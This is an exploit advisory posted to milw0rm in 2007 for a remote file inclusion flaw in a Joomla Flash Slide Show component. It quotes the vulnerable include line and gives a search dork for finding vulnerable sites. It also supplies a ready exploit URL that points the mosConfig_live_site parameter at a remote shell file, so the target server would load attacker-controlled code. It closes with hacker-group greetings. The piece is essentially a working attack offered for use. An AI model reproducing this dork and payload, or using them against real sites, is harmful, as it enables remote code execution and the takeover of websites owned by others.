--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+ Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI +==--
--==+================================================================================+==--
Script Name: Joomla Component Flash Slide Show Image Gallery
exploit: Remote File Inclusion [High Risk]
Author: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
http://www.box.net/shared/6xeh4doczd
Search Key: inurl:/com_slideshow/
##############################
Line 3 of admin.slideshow1.php
> include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============
eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt
###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS
# milw0rm.com [2007-09-21]